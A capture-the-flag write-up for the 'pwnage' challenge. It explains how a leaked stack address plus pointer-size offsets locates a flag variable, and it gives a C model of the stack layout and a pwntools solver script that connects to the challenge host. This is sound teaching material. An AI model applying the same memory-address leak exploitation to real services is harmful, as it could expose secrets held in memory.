binex/pwnage
By awt. 190 Solves (100 Points).
Description
It's either a bug, a hack, an exploit, or it's pwnage.
Let this challenge stand as one of the first of many stairs to mastery over that which can only be described as pwn.
Hints
Connect using nc (aka Netcat)
Summary
The challenge prints the address of the current stack frame. Our job is to give the program the address of the flag variable; at the end, the program prints the value stored at the address we supplied. The length of the printed stack-frame address shows that the program is running on a 64-bit architecture, so each pointer-sized slot occupies 8 bytes. All that is needed is to take the printed stack-frame address and add the appropriate offset until it reaches the address of the flag variable.
Solutions
The challenge provides an incomplete C source file.
From it, I learned that the program prints the address of the current stack frame and then asks the user to input the address of the flag variable.

From the source shown in the picture above, the program takes the address of first_var and then moves two positions back from it on the stack. The remaining problem is that we do not know for sure which machine architecture the program runs on, and that determines how large each "position" is. The difference shows in the length of a printed address: a 64-bit machine typically prints longer addresses than a 32-bit one. So I connected with netcat to see what the program actually does.

Here the printed address is longer than a 32-bit address would be, so my assumption is that the target is a 64-bit machine. The next question is how many bytes each address (that is, each pointer) occupies.
While researching this, I found a Reddit thread in which a user explains how many bytes are needed to address all of memory: 8 bytes per pointer on a 64-bit machine, 4 bytes on a 32-bit machine.

Now I just need to add to the stack-frame address until it reaches the address of flag. The stack-frame address was obtained by moving two steps back from first_var's address, so moving two steps forward again gives the address of first_var.

Because the program's pointer arithmetic moves in units of the pointer size, "two steps" is 2 × 8 = 16 bytes on a 64-bit machine: adding 16 bytes to the printed stack-frame address gives the address of first_var. Based on the code, all the variables are pointers, and on a 64-bit machine each pointer occupies 8 bytes, so the flag variable sits two slots, 16 more bytes, above first_var. Adding 16 bytes to first_var's address therefore yields the address of the flag variable. Note that this relies on the compiler laying out the locals in exactly that order with no padding between them; the offsets are an assumption that is confirmed only when the program hands back the flag.
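As an added example (not the challenge's own source, which is only partly shown above), the following C program models the stack layout this reasoning assumes: a struct of consecutive pointer-sized slots stands in for the locals, the program leaks `&first_var - 2` exactly as the challenge does, and the solver's "two slots forward, two slots forward" arithmetic is written in terms of `sizeof(void *)` so the same code is correct on a 32-bit build. The slot names other than `first_var` and `flag`, the placement of `flag` two slots above `first_var`, the function names, and the sample flag string are all assumptions made for this model.

```c
/* Added example: a deterministic model of the stack layout the writeup
 * assumes. The struct members other than first_var and flag, the layout,
 * and the secret string are assumptions for this model, not the challenge. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Five consecutive pointer-sized slots. On a 64-bit target each slot is
 * 8 bytes, on a 32-bit target 4 bytes; sizeof(void *) tracks that. */
struct model_frame {
    const char *slot0;     /* assumed: what &first_var - 2 points at */
    const char *slot1;
    const char *first_var; /* the variable the program starts from */
    const char *slot3;
    const char *flag;      /* assumed: two slots above first_var */
};

/* What the challenge prints: the address two pointer-slots before
 * first_var. Arithmetic on a (const char **) moves in units of
 * sizeof(const char *), so "2 positions back" is 2 * sizeof(void *) bytes. */
uintptr_t leaked_frame_address(struct model_frame *f)
{
    return (uintptr_t)(&f->first_var - 2);
}

/* The solver's arithmetic from the writeup, in terms of the pointer width:
 * frame + 2 slots = first_var, first_var + 2 slots = flag. */
uintptr_t guess_flag_address(uintptr_t frame)
{
    uintptr_t first_var = frame + 2 * sizeof(void *);
    return first_var + 2 * sizeof(void *);
}

/* Read the string pointer stored at the guessed address, as the challenge
 * does when it prints the value at the address the user supplied. */
const char *read_at(uintptr_t addr)
{
    return *(const char **)addr;
}

/* Builds the model frame, leaks it, applies the solver arithmetic and
 * checks that the guess lands on flag and dereferences to the secret.
 * Returns 1 on success, 0 otherwise. */
int model_check(void)
{
    /* Constructed sample data for the model; not the real flag. */
    const char *secret = "bcactf{constructed_flag_for_this_model}";
    struct model_frame f;
    memset(&f, 0, sizeof f);
    f.first_var = "first_var";
    f.flag = secret;

    uintptr_t frame = leaked_frame_address(&f);
    uintptr_t guess = guess_flag_address(frame);

    if (guess != (uintptr_t)&f.flag)
        return 0;
    return strcmp(read_at(guess), secret) == 0;
}

int main(void)
{
    struct model_frame f;
    memset(&f, 0, sizeof f);
    f.first_var = "first_var";
    f.flag = "bcactf{constructed_flag_for_this_model}";

    uintptr_t frame = leaked_frame_address(&f);
    uintptr_t guess = guess_flag_address(frame);
    printf("pointer size         : %zu bytes\n", sizeof(void *));
    printf("leaked frame address : %#lx\n", (unsigned long)frame);
    printf("computed flag address: %#lx\n", (unsigned long)guess);
    printf("value stored there   : %s\n", read_at(guess));
    return model_check() ? 0 : 1;
}
```

Compile with `cc -o model model.c && ./model`; on a 32-bit build (`-m32`) the slot size becomes 4 bytes and the arithmetic still lands on `flag`, which is the point of writing the offsets as multiples of `sizeof(void *)` rather than hard-coding 16.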

Based on this assumption, I wrote a solver script in Python with pwntools to automate the whole process.
```python
from pwn import *
# Connect to the challenge service.
p = remote("challs.bcactf.com", "30810")
# The program prints the stack-frame address after the words "in is";
# parse the hex value that follows.
p.recvuntil(b"in is")
stack_frame_address = int(p.recvline().strip(), 16)
# The printed address is &first_var - 2 on a 64-bit target, so two
# 8-byte slots forward is first_var, and two more slots is flag.
first_var_address = stack_frame_address + (8 * 2)
flag_address = first_var_address + (8 * 2)
# Send the computed address as a hex string at the prompt, then read the
# rest of the output, which includes the value stored at that address.
p.recvuntil(b"guess> ")
p.sendline(hex(flag_address).encode())
print(p.recvall())
```
Flag
bcactf{0nE_two_thR3E_f0ur_567___sT3ps_t0_PwN4G3_70cc0e5edd6ea}